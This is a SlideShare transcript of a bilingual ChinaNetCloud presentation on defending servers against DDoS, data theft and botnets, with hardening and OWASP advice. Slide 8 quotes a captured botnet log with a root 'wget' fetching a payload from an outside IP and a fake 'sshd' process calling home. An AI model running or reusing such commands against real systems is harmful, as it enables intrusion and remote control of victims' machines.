SlideShare a Scribd company logo
1 of 22
Download to read offline
Copyright © 2015 ChinaNetCloudServer Management  Cloud computing  System Consulting
Running the World’s Internet
Servers
运维安全:抵抗黑客攻击
云络 王 寒
ChinaNetCloud – Solution Proposal *** Confidential ***
2
令人激动的互联网
ChinaNetCloud – Solution Proposal *** Confidential ***
3
融入生活每一部分
ChinaNetCloud – Solution Proposal *** Confidential ***
4
但,不是诸事如意
ChinaNetCloud – Solution Proposal *** Confidential ***
5
当今三大安全问题
DDoS
数据盗窃
Botnets 僵尸网络
ChinaNetCloud – Solution Proposal *** Confidential ***
6
Security Problem #1 – DDoS
第一安全问题-DDoS
• For Fun 捣蛋
• Get Money 赚钱
• Competitors 竞争
ChinaNetCloud – Solution Proposal *** Confidential ***
7
Security Problem #2 – Stealing Data
第二安全问题-数据盗窃
• Steal Money
偷钱
• Steal/Sell Data
偷数据
• Steal Code
偷代码
ChinaNetCloud – Solution Proposal *** Confidential ***
8
Security Problem #3 – BotNETs
第三个安全问题-僵尸网络
• Break In 攻入
• Install Root Kit 安装
• Call home for control 呼叫
• Do evil 作恶
Apr 23 14:34:03 [/root]# wget http://61.147.103.146:999/IP
root 1451 0.1 0.0 75196 1260 ? Ssl 00:54 1:36 /root/sshd
sshd 1451 root 4u IPv4 318269 0t0 TCP :22839->36.251.187.212:13800 (ESTABLISHED)
ChinaNetCloud – Solution Proposal *** Confidential ***
9
四层安全
系统网络
代码 运维
ChinaNetCloud – Solution Proposal *** Confidential ***
10
网络安全
• DDoS 攻击1 Overload Bandwidth 带宽超载
• DDoS 攻击2 Overload Servers 服务器超载
• Cloud Filtering – Anquanbao 安全宝
• CDN Support -CDN支持
• IDC Hardware -IDC 硬件
• Front of Application — WAF
DDoS 策略
ChinaNetCloud – Solution Proposal *** Confidential ***
11
系统安全
• Required – Basic protection
要求-基本的保护
• Basic filtering
基本的过滤
• NAT inbound
• ssh, monitoring
• NAT outbound
• Backups, DNS, ntp, updates
WAF 网页应用防火墙
传统防火墙
• Two key protections
两种主要的防护
• Protect Application Code
保护应用代码
• OWASP basics
• SQL, XSS
• Dedicated Hardware
专有硬件设备
• Palo Alto Networks
• Software / Virtual
软件/虚拟服务
• Anquanbao - 安全宝
• Aliyun Cloud Shell - 云盾
• Software Module
软件模块
• modSecurity
• DDoS Filtering & Limiting
过滤和限制
• IP, agent, url, session
ChinaNetCloud – Solution Proposal *** Confidential ***
12
代码安全 —— OWASP项目
Key Points要点
• A1 – Injection
• A2 – Auth & Session Mgmt
• A3 – XSS
• A7 – Function ACLs
• A8 – CSRF
• A9 – Insecure Components
http://owasp.org.cn
ChinaNetCloud – Solution Proposal *** Confidential ***
13
代码安全 —— 代码扫描
• Best practice
最佳实践
• Find new problems
找到新问题
• As you update
更新
• Third parties
第三方
• New exploits
新的改进
ChinaNetCloud – Solution Proposal *** Confidential ***
14
运维安全 —— 经常被遗忘
• Often forgotten
经常被遗忘
• Often use defaults
经常采取默认设置
• Or random Google search
或用谷歌搜索配置
• Source of great danger
风险的发源地
ChinaNetCloud – Solution Proposal *** Confidential ***
15
运维安全 —— 服务器
• Best practices
最佳实践
• Lots of small issues
许多细小问题
• Running user - 用户运行
• File permissions - 文件许可
• Dangerous uploads - PHP inside JPEGs
危险的上传
• SSL – Heartbleed, etc.
APP 服务器Web 服务器
• Best Practices
最佳实践
• Delete example APPs
删除样例
• Delete tools (Tomcat)
删除工具
• Patch Software (Java!)
软件补丁
ChinaNetCloud – Solution Proposal *** Confidential ***
16
运维安全 —— 服务器
数据库
• Use Best Practices
最佳实践
• Secure Configuration
安全配置
• Limited User Permission
限制用户许可
• Separate App & DBA User
区分APP和DBA用户
• Separate User for each App
区分每个APP的用户
• Safe File Permissions
安全的文件许可
• Log SQL if possible
尽可能记录SQL
ChinaNetCloud – Solution Proposal *** Confidential ***
17
运维安全 —— 操作系统
• Hardened OS
加固
• Iptables
防火墙
• Run Users
用户运行
• File permissions
文件许可
• Logging
日志
• Scanning (ClamAV)
扫描
• Track activity
轨迹追踪
• Automate
自动
• System Updates
系统升级
ChinaNetCloud – Solution Proposal *** Confidential ***
18
运维安全 —— 云平台
• Best Practice
最佳实践
• Control Access
控制登录权限
• Can delete EVERYTHING
会被意外删除
• Separate Backups
备份隔离
• Out of Cloud
在云之外
• MFA Delete on AWS
AWS上删除MFA
ChinaNetCloud – Solution Proposal *** Confidential ***
19
运维安全 —— 网络
• Generally okay, BUT
• VPC on Clouds – Separate
使用公共云上隔离的私有网络
• Consider Out-of-Band Link (DDoS)
考虑带外数据链接
• Firewalls – Front & Middle
防火墙-前端&中间
• Secure Configuration
安全配置
• Separate test/dev network
区分测试/开发
ChinaNetCloud – Solution Proposal *** Confidential ***
20
运维安全 —— 备份安全
• Backups ARE part of Security
备份属于安全管理的范畴
• If all else fails, use backups
若发生意外,使用备份
• Keep them Secure
安全备份
• Avoid Theft & Tampering
防止盗窃或恶意企图
• Read-Only is Best
最好采用只读
运维安全 —— 安全监控
运维安全 —— 审计
Deep Check to Find Problems
深入检查,发现问题
ChinaNetCloud – Solution Proposal *** Confidential ***
总结
Security is Critically Important
安全非常重要
Increasingly Important
并且,越来越重要
Getting Harder
但也,越来越难
But more Tools
但,实用工具越来越多
Details & Experts Help
注重细节,并且需要专家帮助
• Deep Experience
丰富经验
• Experts at Every Level
全面专业
• Part of Overall Operations
是运维工作的一部分
云络可以帮您
ChinaNetCloud – Solution Proposal *** Confidential ***
22
谢 谢!

More Related Content

What's hot

Android Taipei 2013 August - Android Apps Security
Android Taipei 2013 August - Android Apps SecurityAndroid Taipei 2013 August - Android Apps Security
Android Taipei 2013 August - Android Apps SecurityTaien Wang
 
用戶端攻擊與防禦
用戶端攻擊與防禦用戶端攻擊與防禦
用戶端攻擊與防禦Taien Wang
 
2017.11.22 OWASP Taiwan Week (Lucas Ko)
2017.11.22  OWASP Taiwan Week (Lucas Ko)2017.11.22  OWASP Taiwan Week (Lucas Ko)
2017.11.22 OWASP Taiwan Week (Lucas Ko)Lucas Ko
 
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...ChinaNetCloud
 
.NET Security Application/Web Development - Part I
.NET Security Application/Web Development - Part I.NET Security Application/Web Development - Part I
.NET Security Application/Web Development - Part IChen-Tien Tsai
 
伺服器端攻擊與防禦II
伺服器端攻擊與防禦II伺服器端攻擊與防禦II
伺服器端攻擊與防禦IITaien Wang
 
.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IV.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IVChen-Tien Tsai
 
淡江大學 - 產品測試+安全性測試+壓力測試
淡江大學 - 產品測試+安全性測試+壓力測試淡江大學 - 產品測試+安全性測試+壓力測試
淡江大學 - 產品測試+安全性測試+壓力測試Taien Wang
 
使安全成為軟體開發必要部分
使安全成為軟體開發必要部分使安全成為軟體開發必要部分
使安全成為軟體開發必要部分Taien Wang
 
一個微信專案從0到000的效能調教
一個微信專案從0到000的效能調教一個微信專案從0到000的效能調教
一個微信專案從0到000的效能調教Bruce Chen
 
6.web 安全架构浅谈
6.web 安全架构浅谈6.web 安全架构浅谈
6.web 安全架构浅谈Hsiao Tim
 
伺服器端攻擊與防禦III
伺服器端攻擊與防禦III伺服器端攻擊與防禦III
伺服器端攻擊與防禦IIITaien Wang
 
OWST - Orange Web Security Toolkit Documentation
OWST - Orange Web Security Toolkit DocumentationOWST - Orange Web Security Toolkit Documentation
OWST - Orange Web Security Toolkit DocumentationOrange Tsai
 
雲端上的資訊安全-Global Azure Bootcamp 2015 臺北場
雲端上的資訊安全-Global Azure Bootcamp 2015 臺北場雲端上的資訊安全-Global Azure Bootcamp 2015 臺北場
雲端上的資訊安全-Global Azure Bootcamp 2015 臺北場twMVC
 
伺服器端攻擊與防禦I
伺服器端攻擊與防禦I伺服器端攻擊與防禦I
伺服器端攻擊與防禦ITaien Wang
 
美团技术沙龙04 美团下一代分布式存储系统
美团技术沙龙04   美团下一代分布式存储系统美团技术沙龙04   美团下一代分布式存储系统
美团技术沙龙04 美团下一代分布式存储系统美团点评技术团队
 
網頁弱點掃描服務簡報 20120606
網頁弱點掃描服務簡報 20120606網頁弱點掃描服務簡報 20120606
網頁弱點掃描服務簡報 20120606Fionsu
 
1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台
1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台
1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台Timothy Chen
 
美团点评技术沙龙14美团云-Docker平台
美团点评技术沙龙14美团云-Docker平台美团点评技术沙龙14美团云-Docker平台
美团点评技术沙龙14美团云-Docker平台美团点评技术团队
 

What's hot (19)

Android Taipei 2013 August - Android Apps Security
Android Taipei 2013 August - Android Apps SecurityAndroid Taipei 2013 August - Android Apps Security
Android Taipei 2013 August - Android Apps Security
 
用戶端攻擊與防禦
用戶端攻擊與防禦用戶端攻擊與防禦
用戶端攻擊與防禦
 
2017.11.22 OWASP Taiwan Week (Lucas Ko)
2017.11.22  OWASP Taiwan Week (Lucas Ko)2017.11.22  OWASP Taiwan Week (Lucas Ko)
2017.11.22 OWASP Taiwan Week (Lucas Ko)
 
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
ChinaNetCloud Online Lecture: Fight Against External Attacks From Different L...
 
.NET Security Application/Web Development - Part I
.NET Security Application/Web Development - Part I.NET Security Application/Web Development - Part I
.NET Security Application/Web Development - Part I
 
伺服器端攻擊與防禦II
伺服器端攻擊與防禦II伺服器端攻擊與防禦II
伺服器端攻擊與防禦II
 
.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IV.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IV
 
淡江大學 - 產品測試+安全性測試+壓力測試
淡江大學 - 產品測試+安全性測試+壓力測試淡江大學 - 產品測試+安全性測試+壓力測試
淡江大學 - 產品測試+安全性測試+壓力測試
 
使安全成為軟體開發必要部分
使安全成為軟體開發必要部分使安全成為軟體開發必要部分
使安全成為軟體開發必要部分
 
一個微信專案從0到000的效能調教
一個微信專案從0到000的效能調教一個微信專案從0到000的效能調教
一個微信專案從0到000的效能調教
 
6.web 安全架构浅谈
6.web 安全架构浅谈6.web 安全架构浅谈
6.web 安全架构浅谈
 
伺服器端攻擊與防禦III
伺服器端攻擊與防禦III伺服器端攻擊與防禦III
伺服器端攻擊與防禦III
 
OWST - Orange Web Security Toolkit Documentation
OWST - Orange Web Security Toolkit DocumentationOWST - Orange Web Security Toolkit Documentation
OWST - Orange Web Security Toolkit Documentation
 
雲端上的資訊安全-Global Azure Bootcamp 2015 臺北場
雲端上的資訊安全-Global Azure Bootcamp 2015 臺北場雲端上的資訊安全-Global Azure Bootcamp 2015 臺北場
雲端上的資訊安全-Global Azure Bootcamp 2015 臺北場
 
伺服器端攻擊與防禦I
伺服器端攻擊與防禦I伺服器端攻擊與防禦I
伺服器端攻擊與防禦I
 
美团技术沙龙04 美团下一代分布式存储系统
美团技术沙龙04   美团下一代分布式存储系统美团技术沙龙04   美团下一代分布式存储系统
美团技术沙龙04 美团下一代分布式存储系统
 
網頁弱點掃描服務簡報 20120606
網頁弱點掃描服務簡報 20120606網頁弱點掃描服務簡報 20120606
網頁弱點掃描服務簡報 20120606
 
1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台
1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台
1116 Windows server 2008 - 使用 IIS 7.0 建置安全站台
 
美团点评技术沙龙14美团云-Docker平台
美团点评技术沙龙14美团云-Docker平台美团点评技术沙龙14美团云-Docker平台
美团点评技术沙龙14美团云-Docker平台
 

Viewers also liked

HITCON GIRLS 成大講座 密碼學(阿毛)
HITCON GIRLS 成大講座 密碼學(阿毛)HITCON GIRLS 成大講座 密碼學(阿毛)
HITCON GIRLS 成大講座 密碼學(阿毛)HITCON GIRLS
 
雲端災難備援:VMware on IBM Cloud
雲端災難備援:VMware on IBM Cloud雲端災難備援:VMware on IBM Cloud
雲端災難備援:VMware on IBM CloudAki Sun
 
Linux 的檔案系統格式介紹
Linux 的檔案系統格式介紹Linux 的檔案系統格式介紹
Linux 的檔案系統格式介紹Ma Yu-Hui
 
HITCON GIRLS 成大講座 基礎知識(蜘子珣)
HITCON GIRLS 成大講座 基礎知識(蜘子珣)HITCON GIRLS 成大講座 基礎知識(蜘子珣)
HITCON GIRLS 成大講座 基礎知識(蜘子珣)HITCON GIRLS
 
The development trends of smart applications and open source system software ...
The development trends of smart applications and open source system software ...The development trends of smart applications and open source system software ...
The development trends of smart applications and open source system software ...William Liang
 
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲ChinaNetCloud
 
困境與轉型:一個小型開發團隊的 DevOps 學習之旅
困境與轉型:一個小型開發團隊的 DevOps 學習之旅困境與轉型:一個小型開發團隊的 DevOps 學習之旅
困境與轉型:一個小型開發團隊的 DevOps 學習之旅Chen Cheng-Wei
 
優化宅的日常-數據分析篇
優化宅的日常-數據分析篇優化宅的日常-數據分析篇
優化宅的日常-數據分析篇Wanju Wang
 
敏捷开发全景视图(流程、方法和最佳实践)
敏捷开发全景视图(流程、方法和最佳实践)敏捷开发全景视图(流程、方法和最佳实践)
敏捷开发全景视图(流程、方法和最佳实践)Weijun Zhong
 
Dell OpenStack Powered Cloud Solution and Case Sharing
Dell OpenStack Powered Cloud Solution and Case SharingDell OpenStack Powered Cloud Solution and Case Sharing
Dell OpenStack Powered Cloud Solution and Case SharingHui Cheng
 
数据库高可用架构
数据库高可用架构数据库高可用架构
数据库高可用架构freezr
 
Yuan Hairong - Shanghai Xa Information Technology
Yuan Hairong - Shanghai Xa Information TechnologyYuan Hairong - Shanghai Xa Information Technology
Yuan Hairong - Shanghai Xa Information TechnologySeismonaut
 
BrightTalk session-The right SDS for your OpenStack Cloud
BrightTalk session-The right SDS for your OpenStack CloudBrightTalk session-The right SDS for your OpenStack Cloud
BrightTalk session-The right SDS for your OpenStack CloudEitan Segal
 
OpenStack & Ceph integration
OpenStack & Ceph integrationOpenStack & Ceph integration
OpenStack & Ceph integrationHaomai Wang
 
行政院簡報 交通部:交通建設與展望
行政院簡報  交通部:交通建設與展望行政院簡報  交通部:交通建設與展望
行政院簡報 交通部:交通建設與展望releaseey
 
Managing Multi-hypervisor OpenStack Cloud with Single Virtual Network
Managing Multi-hypervisor OpenStack Cloud with Single Virtual NetworkManaging Multi-hypervisor OpenStack Cloud with Single Virtual Network
Managing Multi-hypervisor OpenStack Cloud with Single Virtual NetworkPLUMgrid
 

Viewers also liked (20)

HITCON GIRLS 成大講座 密碼學(阿毛)
HITCON GIRLS 成大講座 密碼學(阿毛)HITCON GIRLS 成大講座 密碼學(阿毛)
HITCON GIRLS 成大講座 密碼學(阿毛)
 
雲端災難備援:VMware on IBM Cloud
雲端災難備援:VMware on IBM Cloud雲端災難備援:VMware on IBM Cloud
雲端災難備援:VMware on IBM Cloud
 
Linux 的檔案系統格式介紹
Linux 的檔案系統格式介紹Linux 的檔案系統格式介紹
Linux 的檔案系統格式介紹
 
HITCON GIRLS 成大講座 基礎知識(蜘子珣)
HITCON GIRLS 成大講座 基礎知識(蜘子珣)HITCON GIRLS 成大講座 基礎知識(蜘子珣)
HITCON GIRLS 成大講座 基礎知識(蜘子珣)
 
The development trends of smart applications and open source system software ...
The development trends of smart applications and open source system software ...The development trends of smart applications and open source system software ...
The development trends of smart applications and open source system software ...
 
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲
 
困境與轉型:一個小型開發團隊的 DevOps 學習之旅
困境與轉型:一個小型開發團隊的 DevOps 學習之旅困境與轉型:一個小型開發團隊的 DevOps 學習之旅
困境與轉型:一個小型開發團隊的 DevOps 學習之旅
 
優化宅的日常-數據分析篇
優化宅的日常-數據分析篇優化宅的日常-數據分析篇
優化宅的日常-數據分析篇
 
敏捷开发全景视图(流程、方法和最佳实践)
敏捷开发全景视图(流程、方法和最佳实践)敏捷开发全景视图(流程、方法和最佳实践)
敏捷开发全景视图(流程、方法和最佳实践)
 
Dell OpenStack Powered Cloud Solution and Case Sharing
Dell OpenStack Powered Cloud Solution and Case SharingDell OpenStack Powered Cloud Solution and Case Sharing
Dell OpenStack Powered Cloud Solution and Case Sharing
 
数据库高可用架构
数据库高可用架构数据库高可用架构
数据库高可用架构
 
Shanghai Underground Space Development and Planning
Shanghai Underground Space Development and PlanningShanghai Underground Space Development and Planning
Shanghai Underground Space Development and Planning
 
Yuan Hairong - Shanghai Xa Information Technology
Yuan Hairong - Shanghai Xa Information TechnologyYuan Hairong - Shanghai Xa Information Technology
Yuan Hairong - Shanghai Xa Information Technology
 
BrightTalk session-The right SDS for your OpenStack Cloud
BrightTalk session-The right SDS for your OpenStack CloudBrightTalk session-The right SDS for your OpenStack Cloud
BrightTalk session-The right SDS for your OpenStack Cloud
 
Mesos intro
Mesos introMesos intro
Mesos intro
 
OpenStack & Ceph integration
OpenStack & Ceph integrationOpenStack & Ceph integration
OpenStack & Ceph integration
 
Business model innovation inspiration gallery
Business model innovation inspiration gallery Business model innovation inspiration gallery
Business model innovation inspiration gallery
 
User portrait
User portraitUser portrait
User portrait
 
行政院簡報 交通部:交通建設與展望
行政院簡報  交通部:交通建設與展望行政院簡報  交通部:交通建設與展望
行政院簡報 交通部:交通建設與展望
 
Managing Multi-hypervisor OpenStack Cloud with Single Virtual Network
Managing Multi-hypervisor OpenStack Cloud with Single Virtual NetworkManaging Multi-hypervisor OpenStack Cloud with Single Virtual Network
Managing Multi-hypervisor OpenStack Cloud with Single Virtual Network
 

Similar to 运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享

Internet System Security Overview
Internet System Security OverviewInternet System Security Overview
Internet System Security OverviewChinaNetCloud
 
分会场八和Net backup一起进入云备份时代
分会场八和Net backup一起进入云备份时代分会场八和Net backup一起进入云备份时代
分会场八和Net backup一起进入云备份时代ITband
 
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...Wales Chen
 
Brochure ahn lab trusguard utm
Brochure ahn lab trusguard utmBrochure ahn lab trusguard utm
Brochure ahn lab trusguard utmahnlabchina
 
深入浅出 V cloud director
深入浅出 V cloud director深入浅出 V cloud director
深入浅出 V cloud directorITband
 
新浪微博平台与安全架构
新浪微博平台与安全架构新浪微博平台与安全架构
新浪微博平台与安全架构n716
 
张松国 腾讯微博架构介绍08
张松国 腾讯微博架构介绍08张松国 腾讯微博架构介绍08
张松国 腾讯微博架构介绍08drewz lin
 
Taobao casestudy-yufeng-qcon
Taobao casestudy-yufeng-qconTaobao casestudy-yufeng-qcon
Taobao casestudy-yufeng-qconYiwei Ma
 
安全云平台的探索实践
安全云平台的探索实践安全云平台的探索实践
安全云平台的探索实践Hardway Hou
 
雲端分散架構的駭客事件與安全問題
雲端分散架構的駭客事件與安全問題雲端分散架構的駭客事件與安全問題
雲端分散架構的駭客事件與安全問題Alan Lee
 
应用虚拟存储 缔造关键业务之路
应用虚拟存储 缔造关键业务之路应用虚拟存储 缔造关键业务之路
应用虚拟存储 缔造关键业务之路ITband
 
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰Scourgen Hong
 
Hacking Nginx at Taobao
Hacking Nginx at TaobaoHacking Nginx at Taobao
Hacking Nginx at TaobaoJoshua Zhu
 
Nodejs & NAE
Nodejs & NAENodejs & NAE
Nodejs & NAEq3boy
 
弹性计算云安全(Elastic Compute Cloud Security)
弹性计算云安全(Elastic Compute Cloud Security)弹性计算云安全(Elastic Compute Cloud Security)
弹性计算云安全(Elastic Compute Cloud Security)im_yunshu
 
Ceph中国社区9.19 Some Ceph Story-朱荣泽03
Ceph中国社区9.19 Some Ceph Story-朱荣泽03Ceph中国社区9.19 Some Ceph Story-朱荣泽03
Ceph中国社区9.19 Some Ceph Story-朱荣泽03Hang Geng
 
Teched 2012 60分钟构建私有云
Teched 2012 60分钟构建私有云Teched 2012 60分钟构建私有云
Teched 2012 60分钟构建私有云Cheng Zhang
 
有道云笔记架构简介
有道云笔记架构简介有道云笔记架构简介
有道云笔记架构简介drewz lin
 
Accelerate Database as a Service(DBaaS) in Cloud era
Accelerate Database as a Service(DBaaS) in Cloud eraAccelerate Database as a Service(DBaaS) in Cloud era
Accelerate Database as a Service(DBaaS) in Cloud eraJunchi Zhang
 
Module 08 防火牆
Module 08 防火牆Module 08 防火牆
Module 08 防火牆rbk19871124
 

Similar to 运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享 (20)

Internet System Security Overview
Internet System Security OverviewInternet System Security Overview
Internet System Security Overview
 
分会场八和Net backup一起进入云备份时代
分会场八和Net backup一起进入云备份时代分会场八和Net backup一起进入云备份时代
分会场八和Net backup一起进入云备份时代
 
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...
 
Brochure ahn lab trusguard utm
Brochure ahn lab trusguard utmBrochure ahn lab trusguard utm
Brochure ahn lab trusguard utm
 
深入浅出 V cloud director
深入浅出 V cloud director深入浅出 V cloud director
深入浅出 V cloud director
 
新浪微博平台与安全架构
新浪微博平台与安全架构新浪微博平台与安全架构
新浪微博平台与安全架构
 
张松国 腾讯微博架构介绍08
张松国 腾讯微博架构介绍08张松国 腾讯微博架构介绍08
张松国 腾讯微博架构介绍08
 
Taobao casestudy-yufeng-qcon
Taobao casestudy-yufeng-qconTaobao casestudy-yufeng-qcon
Taobao casestudy-yufeng-qcon
 
安全云平台的探索实践
安全云平台的探索实践安全云平台的探索实践
安全云平台的探索实践
 
雲端分散架構的駭客事件與安全問題
雲端分散架構的駭客事件與安全問題雲端分散架構的駭客事件與安全問題
雲端分散架構的駭客事件與安全問題
 
应用虚拟存储 缔造关键业务之路
应用虚拟存储 缔造关键业务之路应用虚拟存储 缔造关键业务之路
应用虚拟存储 缔造关键业务之路
 
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰
从林书豪到全明星 - 虎扑网技术架构如何化解流量高峰
 
Hacking Nginx at Taobao
Hacking Nginx at TaobaoHacking Nginx at Taobao
Hacking Nginx at Taobao
 
Nodejs & NAE
Nodejs & NAENodejs & NAE
Nodejs & NAE
 
弹性计算云安全(Elastic Compute Cloud Security)
弹性计算云安全(Elastic Compute Cloud Security)弹性计算云安全(Elastic Compute Cloud Security)
弹性计算云安全(Elastic Compute Cloud Security)
 
Ceph中国社区9.19 Some Ceph Story-朱荣泽03
Ceph中国社区9.19 Some Ceph Story-朱荣泽03Ceph中国社区9.19 Some Ceph Story-朱荣泽03
Ceph中国社区9.19 Some Ceph Story-朱荣泽03
 
Teched 2012 60分钟构建私有云
Teched 2012 60分钟构建私有云Teched 2012 60分钟构建私有云
Teched 2012 60分钟构建私有云
 
有道云笔记架构简介
有道云笔记架构简介有道云笔记架构简介
有道云笔记架构简介
 
Accelerate Database as a Service(DBaaS) in Cloud era
Accelerate Database as a Service(DBaaS) in Cloud eraAccelerate Database as a Service(DBaaS) in Cloud era
Accelerate Database as a Service(DBaaS) in Cloud era
 
Module 08 防火牆
Module 08 防火牆Module 08 防火牆
Module 08 防火牆
 

More from ChinaNetCloud

AWS ELB Tips & Best Practices
AWS ELB Tips & Best PracticesAWS ELB Tips & Best Practices
AWS ELB Tips & Best PracticesChinaNetCloud
 
OpsStack--Integrated Operation Platform
OpsStack--Integrated Operation PlatformOpsStack--Integrated Operation Platform
OpsStack--Integrated Operation PlatformChinaNetCloud
 
ChinaNetCloud Online Lecture:Something About Tshark
ChinaNetCloud Online Lecture:Something About TsharkChinaNetCloud Online Lecture:Something About Tshark
ChinaNetCloud Online Lecture:Something About TsharkChinaNetCloud
 
Steve Mushero on Entrepreneurship - 创业 - 崔牛会
Steve Mushero on Entrepreneurship - 创业 - 崔牛会Steve Mushero on Entrepreneurship - 创业 - 崔牛会
Steve Mushero on Entrepreneurship - 创业 - 崔牛会ChinaNetCloud
 
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in ChinaChinaNetCloud
 
AWS Summit OaaS Talk by ChinaNetCloud
AWS Summit OaaS Talk by ChinaNetCloudAWS Summit OaaS Talk by ChinaNetCloud
AWS Summit OaaS Talk by ChinaNetCloudChinaNetCloud
 
Running Internet Systems in China - The Details You Need to Succeed in Chines...
Running Internet Systems in China - The Details You Need to Succeed in Chines...Running Internet Systems in China - The Details You Need to Succeed in Chines...
Running Internet Systems in China - The Details You Need to Succeed in Chines...ChinaNetCloud
 
Making Internet Operations Easier
Making Internet Operations EasierMaking Internet Operations Easier
Making Internet Operations EasierChinaNetCloud
 
Internet Cloud Operations - ChinaNetcloud & AWS Event Beijing
Internet Cloud Operations - ChinaNetcloud & AWS Event BeijingInternet Cloud Operations - ChinaNetcloud & AWS Event Beijing
Internet Cloud Operations - ChinaNetcloud & AWS Event BeijingChinaNetCloud
 
Big Data Security (ChinaNetCloud - Guiyang Conference)
Big Data Security (ChinaNetCloud - Guiyang Conference)Big Data Security (ChinaNetCloud - Guiyang Conference)
Big Data Security (ChinaNetCloud - Guiyang Conference)ChinaNetCloud
 
Why Work at ChinaNetCloud
Why Work at ChinaNetCloudWhy Work at ChinaNetCloud
Why Work at ChinaNetCloudChinaNetCloud
 
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco event
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco eventCloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco event
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco eventChinaNetCloud
 
Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维
Automatically Managing  Internet Operations  In The Cloud - 云计算平台的自动化运维Automatically Managing  Internet Operations  In The Cloud - 云计算平台的自动化运维
Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维ChinaNetCloud
 
ChinaNetCloud - Aliyun Joint Event on Cloud Operations
ChinaNetCloud - Aliyun Joint Event on Cloud Operations ChinaNetCloud - Aliyun Joint Event on Cloud Operations
ChinaNetCloud - Aliyun Joint Event on Cloud Operations ChinaNetCloud
 
ChinaNetCloud - Public Clouds in China Overview
ChinaNetCloud - Public Clouds in China OverviewChinaNetCloud - Public Clouds in China Overview
ChinaNetCloud - Public Clouds in China OverviewChinaNetCloud
 
ChinaNetCloud - China Internet Infrastructure Summary
ChinaNetCloud - China Internet Infrastructure SummaryChinaNetCloud - China Internet Infrastructure Summary
ChinaNetCloud - China Internet Infrastructure SummaryChinaNetCloud
 
Linux Memory Basics for SysAdmins - ChinaNetCloud Training
Linux Memory Basics for SysAdmins - ChinaNetCloud TrainingLinux Memory Basics for SysAdmins - ChinaNetCloud Training
Linux Memory Basics for SysAdmins - ChinaNetCloud TrainingChinaNetCloud
 
Networking Layer Basics - ChinaNetCloud Training
Networking Layer Basics - ChinaNetCloud TrainingNetworking Layer Basics - ChinaNetCloud Training
Networking Layer Basics - ChinaNetCloud TrainingChinaNetCloud
 
ChinaNetCloud Training - iptables Intro
ChinaNetCloud Training - iptables IntroChinaNetCloud Training - iptables Intro
ChinaNetCloud Training - iptables IntroChinaNetCloud
 

More from ChinaNetCloud (20)

AWS ELB Tips & Best Practices
AWS ELB Tips & Best PracticesAWS ELB Tips & Best Practices
AWS ELB Tips & Best Practices
 
OpsStack--Integrated Operation Platform
OpsStack--Integrated Operation PlatformOpsStack--Integrated Operation Platform
OpsStack--Integrated Operation Platform
 
ChinaNetCloud Online Lecture:Something About Tshark
ChinaNetCloud Online Lecture:Something About TsharkChinaNetCloud Online Lecture:Something About Tshark
ChinaNetCloud Online Lecture:Something About Tshark
 
Steve Mushero on Entrepreneurship - 创业 - 崔牛会
Steve Mushero on Entrepreneurship - 创业 - 崔牛会Steve Mushero on Entrepreneurship - 创业 - 崔牛会
Steve Mushero on Entrepreneurship - 创业 - 崔牛会
 
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China
